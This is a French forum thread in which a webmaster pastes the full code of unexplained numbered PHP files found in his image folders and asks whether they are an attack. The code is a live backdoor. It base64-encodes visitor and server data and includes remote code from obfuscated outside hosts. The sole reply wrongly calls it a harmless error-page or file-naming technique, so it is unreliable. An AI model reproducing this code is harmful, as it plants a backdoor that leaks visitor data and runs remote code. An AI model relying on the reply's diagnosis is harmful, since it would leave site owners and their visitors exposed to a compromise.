Fichier php avec un nom en forme de nombre

Fermé
vance - 30 janv. 2010 à 14:46
giheller Messages postés 1875 Date d'inscription dimanche 14 juin 2009 Statut Membre Dernière intervention 3 février 2024 - 30 janv. 2010 à 14:59
Bonjour,

je gére un site web et j'ai découvert il y a peu que des fichiers sous la forme "123651.php" était présent dans une grosse partie des repertoires où il y a des images, ce fichier contient ces codes php :

error_reporting(0);
$s="e";
$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);
$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);
$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
$i=(isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);
$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);
$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i).".".base64_encode($j);
if ((include(base64_decode("aHR0cDovLw==").base64_decode("YS5yc2RjcmFmdC53cw==")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_decode("YWQucnVud2ViLmluZm8=")."/?".$str);}

je voudrais bien savoir à quoi ca sert, en me disant que cela est une sorte d'attaque

1 réponse

giheller Messages postés 1875 Date d'inscription dimanche 14 juin 2009 Statut Membre Dernière intervention 3 février 2024 142
30 janv. 2010 à 14:59
Bonjour,

pourquoi une sorte d'attaque ?
un tel fichier peut servir par exemple à aiguiller l'affichage du code d'erreur comme vous dites en prenant le code.
soit :

j'ai une erreur 404, je vais afficher le contenu de 404.php
si j'ai 403 je vais afficher 403.php

ainsi sans faire de if, de case ou autres tests, en récupérant ce nombre j'affiche la bonne explication.

autre exemple,
imaginons un code matricule, cette technique permet de gérer des noms d'images qui prennet 001.jpg, 002.jpg ; chaque image ayant comme nom : n0_matricule.jpg.
facile alors d'afficher la tête qui va avec le bon matricule.
0